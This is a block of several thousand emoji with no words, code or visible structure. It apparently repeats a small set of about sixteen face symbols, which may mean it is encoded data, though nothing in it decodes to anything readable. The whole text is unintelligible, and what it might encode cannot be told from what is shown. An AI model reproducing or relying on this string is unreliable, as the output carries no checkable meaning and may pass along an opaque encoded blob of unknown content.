😃😉🤪😆😁😇😇🙂😅🤪😇😂🙃😀🙂😉🙃😄🤣😊😅😆😊😝😁😜🙂😜😄🙂😀😀😜😊😀😄😝😊😇😅😁😝😉😅😁😜🙃🙂😂😃🤣😊😂😁😆😇😁😅😊🤪😃🙂😝😜😜🙂🤪😃😝😊🤪😁😊😇😉🤣😁🤪🙂😇😆😀🤣🙃😅😄😆😊😁😆😄😝😃🤣😂🤪😜🙂🙂😀😝🙃🤪😄😊😊😉😆🙃😝🙂🤣😝😜🤣🙂😊😃😆😉😉😁😄😇😃😅😀😝😜😂😁😜😝🙂🤪😃😊😉😇😁🙃😇🤪😅😂🤪🤣😂🙃😀😆🤪😜😄😄😊😄😆😀😝😆😅🤪😜😃🙂🤪😀😊🙃😉😄🙃😃😆😆😂😝😂🤣😅😜😆😝😁😃😄😉🤣😁😀😇😄😆🤪😝😝🤣😇😀😝😃🙂😃🙃😉🤪😁😂😜😀😅😂🤪😆😂😁😃😆🙃😃😄😀😊🤣😁🤪🤣😁😅😝🤪😊😂😉😃😊🙃🙂😄😂😊🤪😆😅😜🙃🤣😆😜😄🙂😃😄😄🙃😜😄🤪😇🤣😆😇😄😜🤣😇😜🙃🙂🙂😄🙃😉🤣😁😅😇🤪😅😁🤪😄😂😄😀😀🙂😜😃🤪😉😝😁😇😝😄😅😉😜😁😂🙂😀🙃🙃🤣😄😅😊😆😆😁😝🙂🤣😃😜🤣😂😜😃😅🙃😝😄😇😊😊😆😉😝🤪🤣🙂😜🙃🙂🤣😃😂😉😆😁😁😇😄😅😃🤪😆🤣😜😀😁🙂😝😃😇😉😊😁🤪😇🙃😅🙂🤪😂😂🤣🤣😃🙃😆😄😆😊😄😆😃😆🤣😅😜😜😄😂😝😀😇🙃😊😄😉😊🙃😆🙂😁😇🤣🤣😜🙃🙂😆😃😆😉😄😁😃😇😀😅😅😀😊🤣😝😀😀🙂😊😂🙃😉🙃😁🙃😇😂😅😂🤪😅😂🙂😃😅🙃😄😄😃😊😀🙃🤪😇🤪😅🤪🤪😇😂😜😃😇🙃🙃😄🙂😊😂😉😝😝😅🤣😅😜😁😊😄🤪😉😉😀😁😆😊🤪🙃😂😝😇😊🤪😜😇🙃😊😉😁😉😂😁😊😇😅😝😀🤪😆😂😄😀😃🙃😀😊😂😉🤪😁😝😇😇😅😇🤪😉😂🙃😀🙂😉🙃😜🤣😊😅😆🙃😝😁😉😊😜😁🙂😀😀😜😉😆😂🙃😊😇😅😃😝😉😂😜😜🙂🙂🙂😃🤣😉🤣😁😆😇😁🤪😜🤪😃😂😀😜😜🙃😀😃😝😉😇😁😊😇😉🙂😜🤪🙂😂😇😀🤣🙃😂😄😆😊😆😆😄😝😅😂😄🤪😜😂🤪😀😝😜🤪😄😊😊😊😆🙃🤪😉😁😂😜🤣🙂😉😃😆🙃😜😁😄😇😃😅😀😝😜😆😁😜😝🙃😃😃😊😉😊😁🙃😇🙃😅😂😜🙂😂😅😀😆🙃🙂😄😄😜😀😆😄😇😜😅🤪😀😝😂😇😀😊🙃😜😄🙃😊😝😆😂🤣😄🤣🤣😜😆🙂😁😃😄😉🤣😁😀😇😃😆🤪😝😜🤣😇😀😃🙂😉😃🙃😉😝😁😂😁😅😅😅🤪😅😂😁😀😁🙃😃😄😆😇😃😁🤪😇😝😅😇😅😉😂😉😀😉🙃🙂😄😊😇🙂😆😅😝😆🤣😁😅🙃🙂😃😃😃🙃😜😆😀🙂😝😆😇🤪😀🤣😉😁🙂🙂😉😃😂😉🤣😅😅😅😜😅😁🤪😂😂😃😀😅🙂😜😂😃😉🤪😅😇😇😊😅😉🤪🤪😂🙂😀😇🙃🤣🙃😃😊😅😅😅😝😄🤣😃😜😂😂😜😇😂🙃😝😄😇😊😊😆😉😝🙃🤣🙂😜😇🙂🤣😃😇😉😆😁😅😇😄😅😂🤪😀🤣😜😀😁🙂😝🙃😁😉😊😁😊😇🙃😅🙃🤪😂😂😉😃😂🙃😆😄😁😊😄😊🙂😝😀🤣😀🤪🤪🙂😃😃🤪🙃😊😄😉😊🙃😇😆😝😂🤣😂😜😅🙃🤣🤪😁😉😄😁🤣😇😀🙂🤪🤪😀🤣😝😜😇😉😊😀🙃😉🙃😁😝😇😂😅😊🤪😅😇😂😀😆😊😄😃😀😊😀😆😆😇🤪🤣😄🤪😇😁😆😀😉😊🙃🤪🤪😊😂😆😊😝😅🤣🙃😜😁😆🤪😃😃😉😀🤣😅😊🤪😅😄😝😇🤣😝😜😉🙂😉😃🙂😉😂😜😆😇😅😅🙃🤪😁😂😊😀😃🙃😀😃😜😇😀🙃🙂😇😇🤣😅🤪😉😄😊😀🙃🙃😂😄🤣😇😂😆😆😝😁🤣😝😜😃😊😜😃😃🙃🤪😄😝😝😇😆😊😝😉😂😆😜🙂🙃😄😃🤣😝🤣😁😆😝😅😅😄🤪😃😂😝😜😜😄😆😃🤪😉😇😁😊😝😇😅🙃🤪🙂🙂😅😀🤣😇😃😄🤣😊😁😆😄🤪😁🤣😀🤪😜🙂😝😀😝😃😁😄😊😊😉😆🙃🤪😉🤣😂😜🤣🙃😅😃😆😀🙂😁😄😇😃😅😀😝😜🤣🤪😜😝🙃🙃😃😊😊😉😁🙃😇🙂😅😂🤪🤣😂😅😀😆🙃🤪😄😄😊😃😆😀😇😜😅🤪🤪😝😂😇😀😊😉😆😄🙃😊🙂😆😂😝🙂🤣😅😜😆🙂😁😃😄😉😊😁😀😇😀😆🤪😝😜🤣😇😃😊🙂😉😃🙃😊😁😁😂😝😀😅😅😆😅😂😁😃😆🙃😃😄😀😊😇😁🤪🤣😁😅😝🤪😊😂😉😃😊🙃🙂😄😂😇😆😆😅🙂😜🤣😁😜😄🙂😃😄😄🙃😜😄🤪😇😇😆😇😃😊🤣😉😜🙃🙂🙂😄🙃😉🤣😁😅😝😆😅😁😃😆😂😄😀😀🙂😜😃🤪😉😝😁😇😝🙂😅😉😜🙃😂🙂😀🙃🙃🤣😁😂😊😆😆😁🤪😀🤣😃😁😄🙂😀😀🤪🙃😝😆😇😊😊😆😉🤪😂🤣🙂😀😅🙂🤣😃😊😉😅😆😅😇😄😅😃🤪😜🤣😜😆😜🙂🤪😃😇😉😊😆😇😇🙃😅🙂😜😂😂🤣😅😅🙃😆😄😁😊😄😅😁😝😀😅😜😜😜😂😝😀😄🙃😊😄😉😊🙃😆🙂😝😂🤣🤣😀😁🙂😆😄😆😉😄😁😁😇😀🤣😃😝🤪🤣😝😀😊🙂😊😝😇😉😉😁🙂😇😂😂🤣🤪😅😂😆😃😄🙃😄😁😀😊😀😉🤪😇🤪😂😝🤪😇😂😊😃🙃🙃🙃😁😂😊😂😄😂😝🤣🤣😆😜😁🙂😄😃😇😉😀😁🤪😊🤪😆😜😝😇🙂😊😜😉🙂🙃😄😆😉😂😆😃😇😅😂😝🤪😅🙂😆😀😃🙃😀😄😝😉🤪😝😁😇😝😅😊🤪😉🙂😊😀🙂🙃😂😁😅😊😅🤣😀😝😁🤣😄😜😃🙃😄😀😜🙃🤪😁😝😊😇😅🤣😝😉🤣🙃😜🙂🙃🙃😃🤣😉😅😆😅😇😁😂😝🤪😄😂😀😜😜🙂🤪😃😝😉😇😆🙃😇😉🤣😉🤪🙂😂🙃😀🤣🙃😅😄😆😊😁😆🤪😝😃🤣🤪🤪😜🙂😀😀😝😊😇😄😊😊😉😅🤣😝🙂😂😄😜🤣😉🤪😃🤣😊😅😁😄😇😃😅😜😝😜😀😆😜🤪🙂😇😃😊😊😇😁🙃😇🙂🤣😂🤪🤣😀😉😀😆🙃😁😄😄😇😁😆😀😇😜🤣😜🤪😝😝🙂😀😝🙃😉😄🙃😇😉😆😂😝🤣😂😂😜😆😃😀😃😄😉😃😁😀😊😜😆🤪😝😝😂😊😜😊🙃😇😃🙃😉😉😁😂😇🤣😅😅🤪😆🙂😀😀😄😉😀😄😀😊😃😁🤪🤪😝😅😇🤪😊🙂🙂😀🙃😉😁😄😂😝😜😆😂🤪🤣🤣😁😜😄🙃😃😃😀😁😅😄😜😊😝😆😇🤪😝🤣😉😜🙃🙃🙃😃😂😇🙃😁🤣😇😆😅😁😜😆😂😃😀😀😉😃😃🤪🙂😃😁😝😇😊😅😉😜😊😂🙂😀😂😉🙃😄😅😃😂😆😆😝😄🤣😃😜😀😂😜😀🤪😉😝😄😇😇🤪😆😉😝😊🤣🙂😜😂🙂🤣😃😅😊😄😁😁😝😄😅😃🤪😄🤣😜😃🤪🙂😝😃😇😊😉😁😉😝😆😅🙂😃😀😂🙂😃😂🙃😆😄😁😇😁😆😃🤣🤣🤣😀🤪🤪😂😝😃🤪🙃😊😄😉😇😊😆🙂😊🙂🤣🤣😜😅🙂😆😄😅😉😄😁😃😝😁😆😜😂😂🤣😝😜😇🙂😊😄😇😉🙃😁🙂😝😊😅🤣🤣😀😂😅😀😁🙃😄😄😃😊😀😁😜😝😜😅😝😀😀😂😊😀😇🙃🙃😄🙂😊😂😆🤣🤪😆🤣😆😀😆🙂😄😃😁😉😀😆😃😊🤪😆😝🤪😇🤣😊😁🙃🙂😊😃🙂😉😂😅🤣😇😅😅😆😜😁😂😄😃😃🙃😀🙃😀😉🤪😆😜😇😇😅😊😜😇😂🙃😄😂🙃😂😄🤣😊😅😆😆😝😁🤣😄😀😃🙂😀😄😃🙃🤪😄😜😊😇🤣😊😝😉🤣🙃😀🙂🙂😂😄🤣😉😅😀😜😇😆😂😄🤪😃😂😀😃😀🙂🤪😄😝😉😇😅😆😇😉😂🙃🤪🙂😂😂😃😂🙃😅😁😅😊😁😂🙂😝😁😂😄🤪😜😂🤪😃😜🙃😇🤣😉😊😇😆🙃😝🙂🙂😂😜🤣🙂😅😄🤣😉😁😆😆😇😃😇😃😝😜🙂😀😜😝🙂😇😄😜😉😉😄😄😇🙃😅😂🤪🤣😂😅😀😆🙃😁😁😆😊😃😅😆😇😜🤣😀🤪😝🙃😇😀😊🙃😉😁😊😊🙂😅🙃😝🤣😜😁😜😅😉😁😃😄😉😃😆😄😊😜🤣😀😝😝😊😊😜😇🙃😇😃🙃😉🙂😆😉😇🤣🙃😆🤪🤣😂😁😀😄😊😃😄😀😉😜😅😃😇😝🤣😜🤪😊🤪😊😀🙃😉😉😄😂😊🤣😅😉😝😆😜🙃😜😁🙂😃😃😀😊😃😄🤪😊😝🤣😄😝😊😂😄😜😉🙂🙂😃😂😊🙂😁😅😇😆🤣😉🤪😄😃😂😀😀🙂😜😃🤪😊😜😁😇😇😊😂😄🤪🙃🙃😉😀🙂🙃🤣😄😅😊😆😆😁😝😄😂🤣😜😀🙃😂😀🤪🙃😜😄😇😊😊😆😉😝🙃😂😊😜😂🙃😊😃😅😉🤣😁😁😇😄😅😃🤪😀🙂😁😜🤪🙂😝😃😇😉😊😁😉😇🙃😅🙂🤪😂🙂😊😀😅😉😝😄😁😊😄😆😃🤪😄😅😜🤪🤪🙃😂😀😇😝😉😄😇😊🙃😆🙂😜😂🤣🤣😜😅🙃🤪😃😁😊😇😁😃😉🙃😅😀😜🤪😅😇😜😇😉😅😃😉😇😁😁🙂😅😅😅😂😀😅😄😄😀😁😉😇😄😃😇😉😁😜😀🙂😅😜😀😇😂😊😀😉😊😁😄🙂😝😃😆🤣😇🤪🤣😅😀😅🙂😄😃😃😊😊😄😜😜😝😆😜😝😇🤣😊😃😉🙂🙃😃🙂😇😄😁🤣🤪😀😅😆😁🤣😂😁😄😃🙃😀😃😜😇🙃😁😝🤪😂😅😊😉😁😂🙃😃😉🙃😂😄🤣😝😃😆😆😉🙃🤣😁😜😃🙂😀😄😜🙃🤪😄😝😝🙂😆😊😜🤣🤣🙃😊🤣🙂🙂😃🤣😉😅😁😆🤪😀😅😄😜😇😂😀😜😜🙂🤪😃😝😉😇😁😊🤪🤣😅🙃🤪😉😂😂😀😂🙃😅😄😆😊😁😆😄🤪😝🤣😀🤪😜😂🤪😄🤣🙃😇😁😝😊😉😆🙃😜😅🤣😂🙂😇🙂🤣😃😆😉😁😆😆😇😃😅😀😜😝🤣🤪😁😅🙂🤪😃😊😉😉😆😊😇🙂😅😂😀😅😂😅😃😄🙃😅😄😄😊😃😅😄😇😜😅🤪😀😝😂😇😁🤪🙃😇😄🙃😊🙂😆😂😝🤣🤣😅😃😃🙂😁😁😄😉😃😁😄😊😜🤣😀😝😝🤣😇😃🙃🙂😉😉😜😉🙃😁😂😇🤣🤣😂🤪😆😂😁😄😃🙃😃🙃😉😊😀😁🤪😇😝🤣🤪🤪😊😂😉😄🙃🙃🙂😃🤣😊😂😆😅😝😆😂😅😜😄🙂😃😁😃🙃😜🙃😂😊😝😆😇😝😊🤣😉😜🙃🙂🙂😁😅😉🤣😅🤣😇😆😅😅🤪😄😂😃😀😀🙂😜😁😉😉😝😅🙃😇😊😂🙂🤪🙃🙂😉😀😂🙃🤣😆😄😊😆😝🙃😝😁🤣😃😜😀🙃😃😀🤪🙃😝😆😉😊😊😆😜😝😊🤣🙂😜😂🙃🙂😃😅😉😆😅😄😇😄😂😝🤪😃🤣😜😜🤪🙃😜😃😇😉😊😅😉😇🙃😄🙂🤪🙂😂🤣😀😅🙃😆😄😁😊😄😅🤪😝😀😂😜🤪🤪😂😜😀😇😉😝😄😉😊🙃🤣🤣😝😂😜😇😜🤣🙂😆😃😁😊😆😁😃😇😀🤣🤪😝🤪🙃😆😜😝🙂😊😃😉😊😊😁🙂😇😂😂🤣🤪😅😂😊😀😁🙃😄😄😃😇😄😁😜😇🤪😂🤪🤪😇🤣😁😀😊🙃🙃😄🙂😊😂😆🤣😝😅🙂😄😜😁😉😁😃😃😉😄😄😜😊🤪😆😝😝😇🙂🙃😜😉😉😁😃🙂😇😅😁🤣🤪😅😅😆🤪😁🙃😀😀😃😉🤪😃😜😇😅😁😜😇😇😅😊🤪😉🙃😅😀🙂😊😆😄🤣😝😁😆😆🤪😅🤣😄😜😃🙃😝😀😜😁😆😄🤪😊😇😆😊🤪😇🤣🙃😜🙂😉😅😃🤣😅😅😁😅😇😁😅😄😜😁😂😀😜😜😉😝😃😝😆🙃😁😊😇😉😅🙃😜😉😂😂😀🤣😊😅😄😆😀😀😆😄😝😃🤣😀🤪😜😂🤪😀😝😊🙃😄😊😝😉😆🙃😝😉🤣😂😀🙂🙂😅😃😆😇😃😁😄😅😂😅😃😝😜🤣🤪😀😜🙂😇😃😊😇🙃😁🙃😂😅😅😂🤪🤣😂😅😃🤣🙃😁😄😄😝😃😆😀😇😉😅🤪🤪😝😂😇😃😝🙃😉😄🙃😝🙃😆😂🤣🙂🤣🤣😜😆🙂😁😃😄😉😃😁😀😝😝😆🤪😜🤪🤣😇😜😝🙂😉😃🙃😉🙂😁😂🤪😆😅😅😜🤪😂😁😄😀🙃😃😆😀😉😜😁🤪🤪😊😅😇😀🙃😂😉😄😀🙃😉😄😂😊🤣😆😅😜😀🤣😁😀😜🙂😃😄🤪🙃😜😆😀😊😝😆😇😜🙂🤣😉🙂😜🙂🙃😃😂😉🤣😆😂😇😆😅😁😀😀😂😃😉😉🙃😀😃🤪😉😝😆🤪😇😊😅😉😀🙂😂🙂🤪😉🙃😂😄😅😊😆😅😅😝😄🤣😃😃😀😂😜😃😊🙃😝😄😇😊😊😆😉😝🙃🤣🙂😃😆🙂🤣😁😅😉😆😁😅😇😄🤣😁🤪😀🤣😜😃😇🙂😝😊😄😉😇😁😉😇🙃🤣😉🤪😂😂🤣😄😆🙃😆😂😂😊😁😆😃😝😀😂😃🤪🤪😂😝😄😇🙃😊😅😉😊🙃😆🙂😝😂😂🙂😜😅🙂😆😁😆😉😄😇🙂😇😃😆😜😝🤪🤣😝😜😇🙂😊😁🙂😉🙃😅🙃😇😂😅🙂🤪😅😂😆😀😁🙃😄😁😜😊😀😅🙃😇🤪😂😊🤪😇🙃😊😀😉🙃🙃😆🤣😊😂🤣😆😝😅😂😊😜😅🙂😄😃😃😉😀😆😊😊🤪🤣😉😝😇🙂🙃😜😉🙃😊😃🙂😉😂😅😁😇😅🤪😉🤪😆😂😄😀😃😉😄😃😜😉🤪😅😊😇😇😂😂🤪😊😂🙃😀🙂😉🙃😄🤣😊😅🤣😁😝😁😝🙂😜😃🙂😀😀😜😊😀😄😝😊😇🤣😊😝😉😃😄😜🙃🙂😂😃🤣😉😅😁😆😇😁🤣😜🤪😃🙃😀😜😜🙃😀😃😝😊🤪😁😊😇😉😂😂🤪🙂😀😝😀😂🙃😅😄😆😇😅😆😄😝😃😂😜🤪😜🙃😇😀😜🙃😇😄😊😇😇😆🙃😝🙂🙂😂😜🤣🤣😊😃😆😉😁😁😄😝😁😅😀😝😜🙂😜😜😝😃😇😃😇😉😉😁🙃😇🙂😅😂🤪🤣🙃😁😀😆😊😆😄😄😊😁😆😀😇😜😅🤪🤪😝🙃😉😀😊😊😆😄🙃😝🤣😆😂😜🤣🤣😅😜😆😉😃😃😄😊😜😁😀😝🤣😅😀😝😝🤣😇😜😊😉🤣😃🙃😇😅😁😂🤪😆😅😅😜🤣😂😁😀😄😉🤪😄😀😆😅😁😜😇😝😅😇😜😝😂😉😀🙃😊🤣😄😂😀😄😆🤣😝😆🤣😁😀😆🙂😃😃😀😊🤪😄🤪😊😊😆😇😝😊🤣😉😀😊🙂🙂😃😂😇🤣😁😅😜😊😅😆🤪😄😂😃😀😀🙂😜😃🤪😇😉😁😇🤪😊😅😉🤪😊😂🙂😃🙃🙃🤣😄😅😝😄😆😁🤣🙂🤣😄😜😀😂😜😄😀🙃😝😄😇😝😉😆😉😝🙂🤣🙂😜😂🙂🤣😄😂🤪😇😁😁🤪😄😅😃😉🙃😂😀😜🤪🙂😝😄🤪😇😆😁😉🤪😉😅🙂🤪😂😂😂😀😅🙃😆😄😁😊😄😆😃🤪🤪😅😜😀😜😂😝😀🤪🙃😊😄😉😊🙃😆🙂😜😅🤣🤣😀😜🙂😆😁😃😉😄😅😃😇😀😆😜😜😇🤣😝😃😉🙂😊😁😃😉😊😁🙂😇😂😅🤣😀😃😂😆😄😀🙃😄😁😜😊😀😅😃😇🤪😅😝😀🙃😂😊😉😀🙃😉😄🙂😊😂😅🙂😝😅🤣😆😃😃🙂😄😊😆😉😃😄😜😊🤪😅😜😝😇🤣😊😃🙃🙂🙃😂😇😉😂😁🤣😇😅🤣🤣🤪😁😂😄😄😃🙃😀🤣😁😉🤪😁😝😇😇😅😊🤪😉😂🙃😄😅🙃😂😆🤣😊😅😆🤣😝😁😂😆😜😃🙂😀😄😝🙃🤪😇😁😊😝😆😊😝😉😂😊😜🙂🙂😂😁😅😉😅🙂😉😇😅😅😄🤪😃🙂😄😜😜🙂🤪😁😝😉😇😉😀😇😇😅🙃🤪🙂🙂🙃😀🤣🙃😅😆😅😊😁😃😊😝😄🤣😀🤪😜😂🤪😀😝🙃😇😆🙃😊😉🤣😉😝🙂🤣🙃😜🤣🙂😅😃😆😉😁😆🤪😇😃🤣😝😝😜🙂😇😜😝🙃🤪😃😊😉😉😅🤣😇🙂🤪😝🤪😂😂😅😀😆😉😅😄😄😊😃😅🤪😇😜😆😂🤪😝😂😇😀😊😉😇😄🙃😊🙂🤣🤣😝🤣😇😆😜🤣🙂😁😃😄😊😁😁😀😊😜🤣🤪😝😝😇🙂😜😊🙂😉😃🙃😉🙂😁😂😇🤣😂😄🤪😆🙃😁😀😄🙃😁😄😀😇😃😁🤪😇😝😂😉🤪😊😃😀😀😉🙃🙂😄😂😇🙂😆😅😝😆🙂😄😜😄😉🤪😃😃🙃😜😄🤪😇😜😆😇😝😊🙂😉😜🙃🤪😀😃😂😉🤣😁😅😝🤣😅😁🤪😄🙃😄😀😀😂😁😃😜😉😝😁😇😇😊😅😉🤪🙃🙃🤣😀😂😊😂😄😅😊🤣😆😁😝😄🤣😃😜😀🙃😊😀🤪😊😉😄😇😝🙃😆😉🤪😊🤣🙂😜😂😉😁😃😅😁😉😁😆😇😄😅😃😜😄🤣😜😜🤪😉😊😃😇😄🙂😁😉😇🙃😅🙂😜🙃😂🤣😀😅😊😁😄😁😇🙂😆😃😝😀😅😜😀😀😂😝😀😇😊😊😄😉😅😀😆🙃😝😂🤣🤣😜😅🙂😆😃😁😊😜😁😃🤪😀😆😜🤪😀🤣😝😀🤪🙂😊😃😉😇😂😁🙂😅😝😅😂🤪😅😂😆😃😅🙃😄😄😃😇😜😁😜😃🤣😅😝🤪😇😂😊😃😇🙃🙃😄🙂😝😂😆🤣🙂😉🤣😆😜😁🙂😄😄😁😉😀😄😜😝😜😆😝😁😄🤣😊😜😉🙂🙃😃🙂😉😂😁🤣🤪😁😅😆😀😆😂😄😀😁🙃😀😃😜😉🤪😁😝🤪🙂😅😊😀😂😂🙃😄🤣🙃😂😁🙂😊😅😆😆😜😀🤣😄🙂😂🙂😃😀😜🙃🤪😁😜😊😇😆😊😜🙂🤣🙃😊😜🙂🙂😃🤣😉😅😆🤣😇😁😅😄😀😀😂😀😜😅🙂😜😃😝😉😇😆😝😇😉😅🙃😀🙂😂😂🙂😃🙃🤣😄😆😊😁😆😄😝😃🤣😀😀😇😂🤪😄😝🙃😇😄😝😊😉😅😊😝🙂🤣😂😃😆🙂😅😉😉😉😆😁😄😇😃🤣😄😝😜🤣🤪😃😇🙂😇😝😝😉😉😁🙃😇🙂🤣🙃🤪🤣😂😅😄😆🙃😁🙃😄😊😄😆😀😇😜😂😀🤪😝😂😇😄😇🙃😉🙃😀😊🙃😆😂😝🤣🤣😅😜😆🙂😁😁😀😉😃😅😃😊😜😅😀😝😝🤣😇😜😊🙂😉😁😅😉🙂😅😆😇🤣😂😁🤪😆🙂😅😀😄🙃😃😁😝😉😜😝😆😇🤪😅😇🤪😊🙂😇😀🙃🙃🙂😆😅😊🤣🙃😇😝😅🤣😁😜😄🙃😁😃😀🙃😜😆😝😊😝😃😝😝😇🤣😉😜🙃🙃😉😃😂😉🤣😅😅😇😆😂😅🤪😁😂😃😀😀🙂😜😃🤪😉😝😅🙃😇😊😂😉🤪🙃😂😉😀😂😉🙂😄😅😊😆🤣😃😝😄😜😂😜😃😂😜😀🤪😉😜😄😇😊😊🤣🙃😝🙃🤣😉😜🙂🙂🤣😃😅😊🤣😁😁😇😄😂😃🤪😀😆🤣😜🤪🙂😝😃😇😊😝😁😉😇🙃😂🙃🤪😂😀😂😀😅🙃😆😄😁😊😄😆😃😝😀😂😝🤪🤪🙃🤪😀😇🙃😝😄😉😊🙃😆🙂😝😂🙂😄😜😅😉😃😃😁😇😀😁😃😝😄😆😜😝🤪🙂😉😜😇😄😃😃😊😉🙃😁🙂😝🙃😅🤣🤪😅🙃😄😀😁😊😊😄😃😊😀😁😜🤪😀😅😝🤪😇🙃😉😀😉🙂😀😄🙂😊😂😆🤣🤪😂🤣😆😜😁😉😄😃😃🤪😝😄😜😊🤪😆😝😝😇🤣😊😜😉😉🤣😃🙂😇😂😁🤣😇😂😅😆😜😅😂😄😀😃😉🤪😃😜😆😆😁🤪😇😇😅😊😜😇😂🙃😀🙂😊🤣😄🤣🤣😇😆😆😝😁🤣😄😀😁🙂😀😀😜😊🤪😄😝😝😜😆😊😝😉🤣🙃😀😉🙂😂😃🤣😇🤣😁😆😜😅😅😁🤪😃😂😀😜😜🙂🤪😃😝😇😉😁😊🤪😊😅🙃🤪😉😂😂😀🤣🙃😅😄😆😇😜😆😄🤪🤪🤣😀😀😝😂🤪😃😜🙃😇😄😊😝😂😆🙃🤣🤪🤣🙂😜🤣🙂😅😄🤣😉😁😁😄😝😜😅😀😀🤪🤣🤪😜😝🙂😇😄😝😉😉😁🙃🤪😂😅😂🤪🤪😂😅😀😆🙃😁😁😆😊😃😆😀🤪😜😅🤪😆😉😂😇😀😊🙃😉😄🙃😊🙂😆😂😜😁🤣😅😃😆🙂😁😃😆😉😃😆😄😊😜😆🤪😜😊🤣😇🙃😃🙂😊😃🙃😉🙂😆🙃😇🤣😅😅😀😁😂😁😅😝🙃😄😄😀😉😜😅😀😇😝😅😇😀😊😂😉😃😊🙃🙃😄😂😊🤣😅😂😝😆🤣😁😃😁🙂😃😁😊😉😀😄🤪😊😝😆😇😉🙂🤣😉😃😂🙂🙂😁🙂😉🤣😁😂😇😆😅😁😂😇😂😃😃😇🙂😜😁😊😉😝😅😉😇😊🤣😇🤪🙃😂🙂😄😆🙃🤣😊😊😊😅😆😁😝😄😂😁😜😀😂😜😄😇🙃😝😂🙂😊😝😆😉😝🙃😂😉😜😂🙂🤣😁😆😉😆🙃🤪😇😄😅😃🤪😀🙂😃😜🤪🙂😝😁😇😉😊😀😆😇😉😅🙂🤪😂😂🤣😀😅🙃😆😆😀😊😄🤣😃😝😀🤣😃🤪🤪🙂😜😀😇🙃😊😆🙂😊🙃😝🤪😝🙂🤣🤣😜😅🙃🤣😃😁😉😄😅😀😇😀😄😃😝😜🤣😝😜😇🙃😝😃😉😉🙃😅🙂😇😂🙂😁🤪😅😂😆😀😁😉😆😄😃😊😀🤣😀😇🤪😅😂🤪😝😂😊😀😉🙃🙃😄🙂😊😂🤣😆😝😅🙂😅😜😁🙂😆😃😃😉😀😄😜😊🤪🤣🙃😝😇🙂🙂😜😉😉😂😃🙂😊🙃😁🤣😇😅😂😃🤪😁😀🙂😀😄🙃😀😃😜😇😀😁😝😇😇😂🙃🤪😉🙂🤪😀😉🙃😂😄🤣😇😂😆😆😝😁🙂😃😜😃😊😁😃😀🙃🤪😄😝😇🤪😆😊😝😉🙂🙃😜🙂😀😄😃😂😉😅😁😆😇😁😅😄🤪😃🙂😝😜😜😉🤪😃😝😉🤪😁😊😝😇😅🙃🤪🙂🙃😅😀🤣😄😊😄😅😊😁😆😄🤪😁🤣😀🤪😜🙃😝😀😝😅😝😄😊😊😉😆🙃🤪😉🤣😂😜🤣😉😅😃😆😝😂😁😆😇😃😅😀😜😃🤣🤪😜😝😉😝😃😊😆🤣😁😉😇🙂😅😂🤪🤣😂😅😀😆😊😃😄😄😝😄😆😀😝😃😅🤪🤪😝😂😇😀😊😊🤣😄🙃😝😅😆😂😜😆🤣😅😀🤣🙂😁😃😄😊🤪😁😀😅😅😆😜😝😝🤣😇😀😝🙂😉😃🙃😇🤣😁😂😝🙂😅😅🤪😆😂😁😃😆🙃😃😄😀😇🤪😁🤪😜😆😅🤪🤪😊😂😉😃😊🙃🙂😄😂😝🤣😆😅😄😉🤣😁😜😄🙂😃😃😀🙃😜😄🤪😝😉😆😇😜😊🤣😉😜😊🙂🙂😄🙃😉🤣😁😅🤪😄😅😁😂🙂😂😄😀😀🙂😜😁😀😉😝😁😇🤪😉😅😉😆😇😂🙂😀😂🙃🤣😁😂😊😆😆😁😜😄🤣😃😇😜😂😜😀🤪🙃😝😁🤪😊😊😆😉😜😉🤣🙂😅😇🙂😂😃😅😉😆😁😁😇😄😅😃😜🤪🤣😜😃😜🙂😝😃🤪😉😊😁😉😇🙃😅🙂😀😁😂🤣😄😄🙃😆😆😃😊😄😅😁😝😀😅😜😀😊😂😝😉😄🙃😇😄😉😊🙃😅😉😝😂🤣🤣😃😁🙂😆🙂😊😉😄😁😃😇😀🤣😃😝🤪🤣😝😃😊🙂😊🤪🙃😉😉😁🙂😇😂🤣🙂🤪😅😂😆😄😁🙃😄😝😉😊😃😁😜😇🤪😅😝🤪😇😂😊😄😂🙃🙃😆🙂😊😂😆🙂😝😅😂🤣😜😁🙂😄😄😜😉😀😇😅😊😜😆😝😝😇😂😝😜😉🙂🙃😁😂😉😂😂🙃😇😂😅😆🤪😁🙂😆😀😃🙃😀😁😜😉🤪😆😀😇😇😅😊🤪😉🙂😊😀🙂🙃😂😆😂😊😅😉🙃😝😁🤣😄😜😃🙂😀😀😜🙃🤪😆😊😊😇🤣😇😝😉🤣😊😜🙂🙂😂😃🤣😉😅😅😀😇😁🤣😜🤪😃🙂🤪😜😜😉😀😃😝😉😇😅🙂😇😉🤪😜🤪🙃😂😂😀🤣😉😂😄😆😊😁🤣😀😝😃🙃😜😜😀😂🤪😀😝😉🤪😄😊😊😉🤣🙂😝🙂😇🙂😜🙂🙂😅😃😆😊😅😁😄😇😃😂😀😝😜😅🤣😜🤪🙂😇😃😊😉😉😁🙃😇🙂😂😆🤪🤣🙃😅😀😆🙃😅😄😄😇😁😆😀😇😜😂😇🤪😝😃😄😀😇🙃😉😄🙃😇😉😆😂😝🤣🙂😆😜😆😁😁😃😄😉😃😁😀😝😃😆🤪😝😝🙂😇😜😊😆🙃😃🙃😉🙂😁😂😝🙂😅😅🤪😆🙃😆😀😄😇😉😄😄😉😜😁🤪😇😝😅😇🤪😊🙃🙂😀🙃😊🙃😄😂😊🙂😆😅😝😆🤣😁😜😄🙃😝😃😀😊😇😄🤪😝😊😆😇🤪😝🤣😉😜🙃😉😅😃😂😁😇😁🤣😇😆😅😁😜😆😂😃😀😀😉😝😃🤪😇🙃😁🤪😇😊😅😉😜😊😂🙂😀😂😊😅😄😅😀🤣😆😆😝😄🤣😃😀😄😂😜😀🤪😊😝😄😇😀😅😆😉😝🙃🤣🙂😜😂🙂🤣😃😅😇😃😁😁🤪😄😅😃🤪😄🤣😜😃😀🙂😝😃😇😇🙃😁😉😅😜😅🙃🤪😂😂🤣😃😂🙃😆😄😁😝😃😆😃🤣😊🤣😀🤪🤪😂😝😃🤪🙃😊😄😉😝🙃😆🙂🙃😇🤣😂😜😅🙂😆😄😅😉😄😁😃🤪😃😆😜😃😀🤣🤪😜😇🙂😊😃😉😉🙃😁🙂🤪😅😅🤣😀🤣😂😆😀😅🙃😄😄😃😊😀😁😜🤪😉😅😝😀🙃😂😊😄🙂🙃🙃😁😉😊😂😆🤣😜😄🤣😆🙂🙃🙂😁😃😃😉😀😆😃😊🤪😆😝😜😉🤣😊🤪😉🙂🙃😃🙂😉😂😆🙂😇😅😅😆😀😄😂😄😊😇🙃😃😃😜😉🤪😆😜😇😇😅😊😀😉😂🙃🤣😝